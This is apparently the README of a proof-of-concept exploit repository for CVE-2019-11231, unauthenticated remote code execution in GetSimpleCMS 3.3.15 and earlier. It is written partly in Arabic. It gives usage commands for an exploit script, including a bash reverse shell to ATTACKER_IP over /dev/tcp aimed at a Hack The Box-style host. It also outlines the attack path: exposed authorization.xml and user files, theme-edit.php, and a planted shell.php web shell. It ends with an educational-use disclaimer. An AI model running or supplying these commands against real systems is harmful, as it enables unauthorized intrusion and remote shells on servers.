
CVE-2019-11231 PoC
استغلال تنفيذ تعليمات برمجية عن بُعد بدون مصادقة لـ GetSimpleCMS ≤ 3.3.15
GetSimpleCMS تعرض ملفات حساسة للعامة (/data/other/authorization.xml, /data/users/) مما يسمح للمهاجمين بـ:
درجة CVSS: 9.8 (حرجة)
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
/admin//data/other/authorization.xml/data/users//admin/theme-edit.php/admin/theme-edit.php/theme/shell.php?cmd=...exploit.py - النص البرمجي الرئيسي للاستغلالrequirements.txt - التبعيات (requests, beautifulsoup4)⚠️ لأغراض تعليمية فقط. اختبر فقط على الأنظمة التي تملكها أو لديك إذن باختبارها.